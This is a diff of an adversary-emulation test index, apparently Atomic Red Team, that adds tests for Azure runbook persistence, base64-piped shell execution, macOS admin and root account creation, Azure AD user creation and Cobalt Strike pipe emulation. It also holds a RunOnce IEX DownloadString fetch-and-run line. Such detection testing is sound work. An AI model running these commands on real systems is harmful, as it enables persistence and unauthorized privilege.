+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
  T1053.002:
    technique:
      x_mitre_platforms:
@@ -51578,6 +51727,7 @@ discovery:
      - 'Cloud Storage: Cloud Storage Metadata'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
    atomic_tests: []
  T1217:
    technique:
@@ -63243,7 +63393,56 @@ initial-access:
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      identifier: T1078.004
-    atomic_tests: []
+    atomic_tests:
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
  T1566.003:
    technique:
      x_mitre_platforms:
@@ -27522,6 +27522,7 @@ execution:
      - User
      - SYSTEM
      x_mitre_remote_support: true
+      identifier: T1559
    atomic_tests: []
  T1204.003:
    technique:
@@ -51312,6 +51313,7 @@ discovery:
      - 'Cloud Storage: Cloud Storage Metadata'
      x_mitre_attack_spec_version: 2.1.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      identifier: T1580
    atomic_tests: []
  T1217:
    technique:
@@ -6799,6 +6799,52 @@ defense-evasion:
          echo $ENCODED > #{encoded_file} && xxd -r -p < #{encoded_file}
          echo $ENCODED > #{encoded_file} && cat #{encoded_file} | xxd -r -p
          echo $ENCODED > #{encoded_file} && cat < #{encoded_file} | xxd -r -p
+    - name: Linux Base64 Encoded Shebang in CLI
+      auto_generated_guid: 3a15c372-67c1-4430-ac8e-ec06d641ce4d
+      description: "Using Linux Base64 Encoded shell scripts that have Shebang in
+        them. This is commonly how attackers obfuscate passing and executing a shell
+        script. Seen [here](https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html)
+        by TrendMicro, as well as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS).
+        Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml)
+        for it. \n"
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        bash_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Jhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        dash_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        fish_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL2Rhc2gKZWNobyAiaHR0cHM6Ly93d3cueW91dHViZS5jb20vQGF0b21pY3NvbmFmcmlkYXkgRlRXIgo=
+        sh_encoded:
+          description: Encoded
+          type: string
+          default: IyEvYmluL3NoCmVjaG8gImh0dHBzOi8vd3d3LnlvdXR1YmUuY29tL0BhdG9taWNzb25hZnJpZGF5IEZUVyIK
+      dependencies:
+      - description: 'base64 must be present
+
+          '
+        prereq_command: 'which base64
+
+          '
+        get_prereq_command: 'echo "please install base64"
+
+          '
+      executor:
+        name: sh
+        elevation_required: false
+        command: |
+          echo #{bash_encoded} | base64 -d | bash
+          echo #{dash_encoded} | base64 -d | bash
+          echo #{fish_encoded} | base64 -d | bash
+          echo #{sh_encoded} | base64 -d | bash
  T1562:
    technique:
      x_mitre_platforms:
@@ -11178,7 +11224,7 @@ defense-evasion:
      description: Modify event viewer registry values to alter the behavior of the
        online help redirection. Upon opening an event in event viewer and attempting
        to view the help page for the event, it will execute the program defined in
-        thed redirection program registry entry.
+        the redirection program registry entry.
      supported_platforms:
      - windows
      input_arguments:
@@ -26073,6 +26119,55 @@ defense-evasion:
          this atomic test : https://cloud.google.com/sdk/docs/install"

          '
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
  T1480.001:
    technique:
      x_mitre_platforms:
@@ -27097,6 +27192,45 @@ defense-evasion:
        cleanup_command: sudo dscl . -delete /Users/AtomicUser
        name: bash
        elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
    - name: WinPwn - Loot local Credentials - powerhell kittie
      auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
      description: Loot local Credentials - powerhell kittie technique via function
@@ -37111,7 +37245,7 @@ privilege-escalation:
      executor:
        command: |
          $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
        cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
          -Force -ErrorAction Ignore

@@ -37161,7 +37295,8 @@ privilege-escalation:
    - name: Suspicious bat file run from startup Folder
      auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
      description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
        Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
        folder and will also run when the computer is restarted and the user logs in.
      supported_platforms:
@@ -41885,6 +42020,55 @@ privilege-escalation:
          this atomic test : https://cloud.google.com/sdk/docs/install"

          '
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
  T1053.002:
    technique:
      x_mitre_platforms:
@@ -42474,6 +42658,45 @@ privilege-escalation:
        cleanup_command: sudo dscl . -delete /Users/AtomicUser
        name: bash
        elevation_required: true
+    - name: Create local account with admin privileges using sysadminctl utility -
+        MacOS
+      auto_generated_guid: 191db57d-091a-47d5-99f3-97fde53de505
+      description: After execution the new account will be active and added to the
+        Administrators group
+      supported_platforms:
+      - macos
+      executor:
+        command: sysadminctl interactive -addUser art-tester -fullName ARTUser -password
+          !pass123! -admin
+        cleanup_command: sysadminctl interactive -deleteUser art-tester
+        name: bash
+        elevation_required: true
+    - name: Enable root account using dsenableroot utility - MacOS
+      auto_generated_guid: 20b40ea9-0e17-4155-b8e6-244911a678ac
+      description: After execution the current/new user will have root access
+      supported_platforms:
+      - macos
+      executor:
+        command: |-
+          dsenableroot #current user
+          dsenableroot -u art-tester -p art-tester -r art-root #new user
+        cleanup_command: |-
+          dsenableroot -d #current user
+          dsenableroot -d -u art-tester -p art-tester #new user
+        name: bash
+        elevation_required: true
+    - name: Add a new/existing user to the admin group using dseditgroup utility -
+        macOS
+      auto_generated_guid: 433842ba-e796-4fd5-a14f-95d3a1970875
+      description: After execution the current/new user will be added to the Admin
+        group
+      supported_platforms:
+      - macos
+      executor:
+        command: dseditgroup -o edit -a art-user -t user admin
+        cleanup_command: dseditgroup -o edit -d art-user -t user admin
+        name: bash
+        elevation_required: true
    - name: WinPwn - Loot local Credentials - powerhell kittie
      auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912
      description: Loot local Credentials - powerhell kittie technique via function
@@ -45777,11 +46000,6 @@ execution:
        '
      supported_platforms:
      - containers
-      input_arguments:
-        command:
-          description: Command to run
-          type: string
-          default: cat
      dependencies:
      - description: 'docker must be installed

@@ -47765,7 +47983,158 @@ execution:
      - User
      - SYSTEM
      x_mitre_remote_support: true
-    atomic_tests: []
+      identifier: T1559
+    atomic_tests:
+    - name: Cobalt Strike Artifact Kit pipe
+      auto_generated_guid: bd13b9fc-b758-496a-b81a-397462f82c72
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          1
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike Lateral Movement (psexec_psh) pipe
+      auto_generated_guid: 830c8b6c-7a70-4f40-b975-8bbe74558acd
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          2
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike SSH (postex_ssh) pipe
+      auto_generated_guid: d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          3
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike post-exploitation pipe (4.2 and later)
+      auto_generated_guid: 7a48f482-246f-4aeb-9837-21c271ebf244
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          4
+
+          '
+        name: command_prompt
+    - name: Cobalt Strike post-exploitation pipe (before 4.2)
+      auto_generated_guid: 8dbfc15c-527b-4ab0-a272-019f469d367f
+      description: |
+        Uses the [Named Pipes Micro Emulation](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/master/micro_emulation_plans/src/named_pipes) executable from the Center for Threat Informed Defense to create a named pipe for inter-process communication.
+
+        The named pipe executable will pause for 30 seconds to allow the client and server to exchange a message through the pipe.
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Named pipe executors must exist on disk
+
+          '
+        prereq_command: 'if ((Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_client.exe)
+          -and (Test-Path PathToAtomicsFolder\T1559\bin\build\namedpipes_server.exe))
+          {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
+          $zipUrl  = "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/raw/master/micro_emulation_plans/src/named_pipes/named_pipes.zip"
+          Invoke-FetchFromZip $zipUrl "*.exe" "PathToAtomicsFolder\T1559\bin"
+      executor:
+        command: '"PathToAtomicsFolder\T1559\bin\build\namedpipes_executor.exe" --pipe
+          5
+
+          '
+        name: command_prompt
  T1204.003:
    technique:
      x_mitre_platforms:
@@ -60051,7 +60420,7 @@ persistence:
      executor:
        command: |
          $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
        cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
          -Force -ErrorAction Ignore

@@ -60101,7 +60470,8 @@ persistence:
    - name: Suspicious bat file run from startup Folder
      auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
      description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
        Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
        folder and will also run when the computer is restarted and the user logs in.
      supported_platforms:
@@ -60449,6 +60819,95 @@ persistence:
          '
        name: sh
        elevation_required: false
+    - name: Azure AD - Create a new user
+      auto_generated_guid: e62d23ef-3153-4837-8625-fa4a3829134d
+      description: Creates a new user in Azure AD. Upon successful creation, a new
+        user will be created. Adversaries create new users so that their malicious
+        activity does not interrupt the normal functions of the compromised users
+        and can remain undetected for a long time.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Display name of the new user to be created in Azure AD
+          type: string
+          default: atomicredteam
+        userprincipalname:
+          description: User principal name (UPN) for the new Azure user being created
+            format email address
+          type: String
+          default: atomicredteam@yourdomain.com
+        password:
+          description: Password for the new Azure AD user being created
+          type: string
+          default: reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Check if AzureAD PowerShell module is installed
+        prereq_command: Get-InstalledModule -Name AzureAD
+        get_prereq_command: echo "use the following to install AzureAD PowerShell
+          module - Install-Module -Name AzureAD -Scope CurrentUser -Repository PSGallery
+          -Force"
+      - description: Check if AzureAD PowerShell module is installed
+        prereq_command: Update the input arguments so the userprincipalname value
+          is accurate for your environment
+        get_prereq_command: echo "Update the input arguments in the .yaml file so
+          that the userprincipalname value is accurate for your environment"
+      executor:
+        command: "Connect-AzureAD\n$userprincipalname = \"#{userprincipalname}\"\n$username
+          = \"#{username}\"      \n$password = \"#{password}\"\n$PasswordProfile =
+          New-Object -TypeName Microsoft.Open.AzureAD.Model.PasswordProfile\n$PasswordProfile.Password
+          = $password\nNew-AzureADUser -DisplayName $username -PasswordProfile $PasswordProfile
+          -UserPrincipalName $userprincipalname -AccountEnabled $true -MailNickName
+          $username      "
+        cleanup_command: Remove-AzureADUser -ObjectId "#{userprincipalname}"
+        name: powershell
+    - name: Azure AD - Create a new user via Azure CLI
+      auto_generated_guid: 228c7498-be31-48e9-83b7-9cb906504ec8
+      description: Creates a new user in Azure AD via the Azure CLI. Upon successful
+        creation, a new user will be created. Adversaries create new users so that
+        their malicious activity does not interrupt the normal functions of the compromised
+        users and can remain undetected for a long time.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Display name of the new user to be created in Azure AD
+          type: string
+          default: atomicredteam
+        userprincipalname:
+          description: User principal name (UPN) for the new Azure user being created
+            format email address
+          type: String
+          default: atomicredteam@yourdomain.com
+        password:
+          description: Password for the new Azure AD user being created
+          type: string
+          default: reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Check if Azure CLI is installed and install manually
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI manually
+          https://aka.ms/installazurecliwindows"
+      - description: Check if Azure CLI is installed and install via PowerShell
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI $ProgressPreference
+          = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows
+          -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I
+          AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+      - description: Update the userprincipalname to meet your requirements
+        prereq_command: Update the input arguments so the userprincipalname value
+          is accurate for your environment
+        get_prereq_command: echo "Update the input arguments in the .yaml file so
+          that the userprincipalname value is accurate for your environment"
+      executor:
+        command: "az login\n$userprincipalname = \"#{userprincipalname}\"\n$username
+          = \"#{username}\"      \n$password = \"#{password}\"\naz ad user create
+          --display-name $username --password $password --user-principal-name $userprincipalname\naz
+          ad user list --filter \"displayname eq 'atomicredteam'\"     "
+        cleanup_command: az ad user delete --id
+        name: powershell
  T1098:
    technique:
      x_mitre_platforms:
@@ -60680,7 +61139,8 @@ persistence:
          type: string
          default: p4sswd
        user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
          type: string
          default: SuperUser
        role_name:
@@ -60705,7 +61165,7 @@ persistence:
          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
          Connect-AzureAD -Credential $Credential

-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
          if ($user -eq $null) { Write-Warning "User not found"; exit }
          $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
          if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -60717,7 +61177,7 @@ persistence:
          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
          Connect-AzureAD -Credential $Credential -ErrorAction Ignore

-          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}'"
+          $user = Get-AzureADUser -Filter "DisplayName eq '#{user_principal_name}' or UserPrincipalName eq '#{user_principal_name}'"
          if ($user -eq $null) { Write-Warning "User not found"; exit }
          $role = Get-AzureADDirectoryRole -Filter "DisplayName eq '#{role_name}'"
          if ($role -eq $null) { Write-Warning "Role not found"; exit }
@@ -60819,7 +61279,8 @@ persistence:
          type: string
          default: p4sswd
        user_principal_name:
-          description: Name of the targeted user (user principal)
+          description: Display Name, or User Principal Name, of the targeted user
+            principal
          type: string
          default: SuperUser
        role_name:
@@ -60848,7 +61309,7 @@ persistence:
          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
          Connect-AzAccount -Credential $Credential

-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
          if ($user -eq $null) { Write-Warning "User not found"; exit }
          $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
          if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
@@ -60863,7 +61324,7 @@ persistence:
          $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
          Connect-AzAccount -Credential $Credential -ErrorAction Ignore

-          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+          $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}" -or $_.UserPrincipalName -eq "#{user_principal_name}" }
